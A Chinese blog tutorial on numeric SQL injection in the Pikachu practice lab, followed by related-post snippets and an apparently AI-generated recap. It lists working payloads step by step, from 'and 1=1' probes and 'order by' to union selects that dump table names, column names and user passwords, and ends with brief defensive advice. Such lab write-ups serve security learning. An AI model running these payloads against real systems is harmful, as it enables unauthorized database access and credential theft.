pikachu(皮卡丘)靶场 sql数字型注入 详细讲解

最新推荐文章于 2025-04-30 12:46:45 发布
最新推荐文章于 2025-04-30 12:46:45 发布
阅读量293 收藏 5
点赞数 6
分类专栏: web 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_89382898/article/details/147571530
版权

实验环境以及工具

phpstudy,burpsuitepikachu,Navicat Premium 16

首先bp(burpsuite)抓包,放到Repeater(重放器)

这里知道是数字型就不做字符数字型判断了

1.判断是否有注入点

(1)将id=1改为id=1 and 1=1(页面正常)

(2)将id=1改为id=1 and 1=2(页面报错)

说明是存在注入点的 

2.通过order by语句判断有几个注入点()

(1)id=1 order by 2(页面正常)

(2)id=1 order by 3(页面报错)

说明有两个注入点

3.尝试union联合来确定注入点

id=1 union select 1,2 (随便2个数字)

 4.爆数据库(可以看到名为pikachu的数据库)

id=1 union select 1,database()

5.爆表名 

id=1 union select 1,table_name from information_schema.tables where table_schema='pikachu'

下面图可以看到关键词users 

 

这里我详细解释一下table_name,information_schema.tables,table_schema(我第一次学的时候想好久没想明白) 

  • information_schema.tablesinformation_schema 是 MySQL 自带的系统数据库,其中的 tables 表是系统表,它存储了 MySQL 服务器中所有数据库和表的元数据信息,是真实存在且可以被查询的。通过查询这个表,能获取各个数据库中的表名、表类型、创建时间等详细信息。
  • table_name 是一个列名,通常用于表示数据库中表的名称。在 SQL 查询里,它代表从某个表中选取的这一列数据。
  • table_schema 是 information_schema.tables 表中的一个列,用于存储每个表所属的数据库名称。

还没理解的话可以仔细看看这张图, 这是Navicat Premium 16(数据库可视化工具)

7.爆列名

id=1 union select 1,column_name from information_schema.columns where table_name='users' 

 

可以看到username和password列 

8.爆密码

id=1 union select username,password from users 

有个地方还是有点疑惑, 暂时先这样

SQL注入pikachu靶场中的SQL注入通关
qq_68163788的博客
05-24 4084
SQL注入是一种常见的网络攻击技术,攻击者利用应用程序对用户输入数据的处理不当,通过在输入字段中插入恶意的SQL代码,从而实现对数据库的非法访问和控制。通过成功利用SQL注入漏洞,攻击者可以执行未经授权的操作,如删除、修改或获取敏感数据。在pikachu靶场中,玩家需要利用自己的技能和知识,深入了解SQL注入的原理和方法,通过不断尝试和实践,最终成功通关。这个过程不仅可以帮助玩家提升对SQL注入漏洞的识别和防范能力,还能加深对网络安全的理解和认识。
通关pikaqu靶场sql注入数字型(一)
Alphamilk的博客
03-21 452
通过burp suite实现对目标网站sql注入,得到所有用户的数据
Pikachu靶场sql注入通关
oiadkt的博客
03-07 6736
pickchu—sql注入通关
pikachu靶场sql注入
2401_83789283的博客
10-27 790
测试发现在username/password/sex/phonenum/email/add/中任意一个变量后面加'都会导致数据库报错。接下来分别传入“id=1 and 1=1”和“id=1 and 1=2”,结果分别为。分别输入admin' order by 3#和admin' order by 2#先用burp抓包,并使用提示上的账号密码登录。说明')是闭合方式,使用')加上题代码爆破。使用'闭合后报错,之后就可以使用报错注入。可用代码分别爆破表名,字段名和值。开启burp抓包,传入id=1为。
pikachu靶场SQL注入
山己见的博客
06-13 1634
pikachu靶场SQL注入(1-3) 1.数字型注入 看题目知道了第一题是数字型注入,下拉框选择,抓个包试试,看来是post,这里我用的是burp。 方便测试,放到repeater里面。 先试一试出列表1 or 1 --+,出结果了。 order by试出来了是2,然后是union select看回显。 然后按流程来,查库,查表,查字段。 select group_concat(schema_name) from information_schema.schemata select group_c
Pikachu(皮卡丘)靶场SQL注入
剁椒鱼头没剁椒的博客
12-14 5809
1)宽字节注入指的是 mysql 数据库在使用宽字节(GBK)编码时,会认为两个 字符是一个汉字(前一个 ascii 码要大于 128(比如%df),才到汉字的范围),而且当我们输入单引号时,mysql 会调用转义函数,将单引号变为’,其中\的十 六进制是%5c,mysql 的 GBK 编码,会认为%df%5c 是一个宽字节,也就是’運’,从而使单引号闭合(逃逸),进行注入攻击。输入kobe’ and 1=1#的时候页面正常,并且kobe’ and 1=2#页面不正常,证明使用单引号闭合。
pikachu靶场通关之sql注入系列
qq_51902218的博客
09-16 7821
1.判断是否注入(是否严格校验)(1)可控参数(id)能否影响页面显示(2)输入的SQL语句是否能报错(能通过数据库报错,看到数据库一些语句痕迹)(selectusername,passwordfromuserwhereid=?’)后面单引号或者双引号通过在URL中修改对应的id值,值为正常数字、大数字、字符(单引号、双引号、双单引号、括号)、反斜杠\来探测URL中是否存在注入(3)输入的SQL语句能否不报错(我们的语句能够成功闭合)(selectusername,passwordf。......
Pikachu靶场--Sql Inject
qq_65150735的博客
06-30 1372
Pikachu靶场--Sql Inject(SQL注入)
pikachu靶机-sql注入
C-HOWE的博客
01-20 996
本篇文章旨在为网络安全渗透测试靶机复现学习(内容学习中,仅供参考)。通过阅读本文,读者将能够对渗透pikachu靶场SQL注入模块有一定的了解。
pikachu靶场-SQL-Inject
braty_的博客
02-23 1545
在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产!SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
pikachu靶场通关之sql注入
qq_74825121的博客
01-21 3620
pikachu靶场通关之sql注入
2022.7.28皮卡丘靶场SQL注入作业
weixin_44503202的博客
07-29 784
sqlmap注入
springboot不连接数据库启动(原先连接了mysql数据库)
uncofish的博客
04-27 294
配置application.properties。配置H2内存数据库(无需真实数据库
PostgreSQL的扩展 pgcrypto
文牧之的博客
04-27 437
pgcrypto 是 PostgreSQL 提供的加密扩展,包含各种加密函数、哈希函数和随机数生成器,是数据库级加密的重要工具。
SQL面试之--明明建了索引为什么失效了?
m0_57098592的博客
04-27 776
索引相关面试问题
PostgreSQL WAL 幂等性详解
king_harry的专栏
04-27 845
PostgreSQL通过这些设计,确保即使在最坏情况下崩溃恢复,也能保证数据一致性和正确性。-> 如果 WAL LSN > Page LSN, 执行修改,更新Page LSN。恢复的核心流程就是不断**Replay(重做)**WAL记录,把数据库恢复到一致状态。-> 如果 WAL LSN <= Page LSN, 说明已经做过,跳过。恢复 -> 读取WAL record -> 找到要修改的Page ->CHECKPOINT;注:FPW是恢复的"大杀器",确保即使发生中间页损坏,也能恢复。
PostgreSQL 中 VACUUM FULL 对索引的影响
最新发布
文牧之的博客
04-30 650
是的,会重建表上的所有索引。这是它与普通VACUUM命令的一个重要区别。
使用 binlog2sql 闪回 MySQL8 数据
书唐瑞的博客
04-26 293
使用 binlog2sql 闪回 MySQL8 数据, Python3
SQLMesh 审计与测试:确保数据质量的利器
neweastsun的专栏
04-28 1181
审计最简单的形式是使用AUDIT语句定义,后面跟着查询。AUDIT (WHERE在这个例子中,我们定义了一个名为的审计,确保每个寿司商品都有一个价格。
pikachu 靶场数字型注入
03-29
<think>好的,用户需要关于Pikachu靶场数字型SQL注入的实验教程。首先,我得回忆一下Pikachu靶场的结构,数字型注入和字符型注入的区别。数字型通常不需要闭合引号,直接注入即可。用户提供的引用中提到了使用'union select等语句,但数字型可能不需要单引号。 接下来,我需要整理实验步骤。首先应该搭建环境,确保Pikachu靶场已经部署好。然后找到数字型注入的入口,比如可能是某个查询参数是数字类型的页面。比如用户信息查询,参数是id=1这样的形式。 然后,测试注入点。使用1 and 1=1和1 and 1=2来判断是否存在注入漏洞。如果页面返回不同,说明存在漏洞。之后确定字段数,用order by来猜测列数。接着联合查询,获取数据库信息,比如数据库名、表名、列名,最后提取数据。 要注意引用用户提供的例子,比如使用database()函数获取数据库名,还有information_schema.columns来获取列信息。需要确保语法正确,比如闭合注释符--+或者-- -。 另外,用户可能需要防御建议,比如参数化查询,过滤输入等。还要生成相关问题,可能涉及其他类型的注入、工具使用或防范措施。 需要检查步骤是否清晰,是否符合实际操作,以及是否正确应用了引用中的示例。确保使用正确的LaTeX格式,变量用$...$,独立公式用$$...$$。同时用中文回答,结构分明,步骤详细。</think>### Pikachu靶场数字型SQL注入实验教程 #### 一、实验准备 1. 部署Pikachu靶场环境(推荐使用PHPStudy+源码包) 2. 访问数字型注入漏洞模块:`/vul/sqli/sqli_id.php` #### 二、注入步骤演示 1. **判断注入点** 输入`1 and 1=1`返回正常,`1 and 1=2`返回异常,说明存在数字型注入漏洞[^1]。 2. **确定字段数** 通过`order by`逐步测试: ```sql 1 order by 2--+ # 正常 1 order by 3--+ # 报错 ``` 确认字段数为2列。 3. **联合查询获取信息** ```sql 1 union select database(),2--+ # 获取当前数据库pikachu ``` 4. **提取表结构** ```sql 1 union select group_concat(table_name),2 from information_schema.tables where table_schema='pikachu'--+ # 获取users等表名[^2] ``` 5. **获取敏感数据** ```sql 1 union select username,password from pikachu.users--+ # 提取账户密码哈希值 ``` #### 三、关键语法说明 - 数字型注入无需闭合引号,直接拼接SQL - `information_schema`系统库存储元数据[^2] - `group_concat()`函数聚合查询结果 - 注释符`--+`或`#`截断后续语句 #### 四、防御建议 1. 使用预处理语句: ```php $stmt = $pdo->prepare("SELECT * FROM table WHERE id = ?"); $stmt->execute([$id]); ``` 2. 强制类型转换:`intval($_GET['id'])` 3. 设置数据库最小权限原则
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值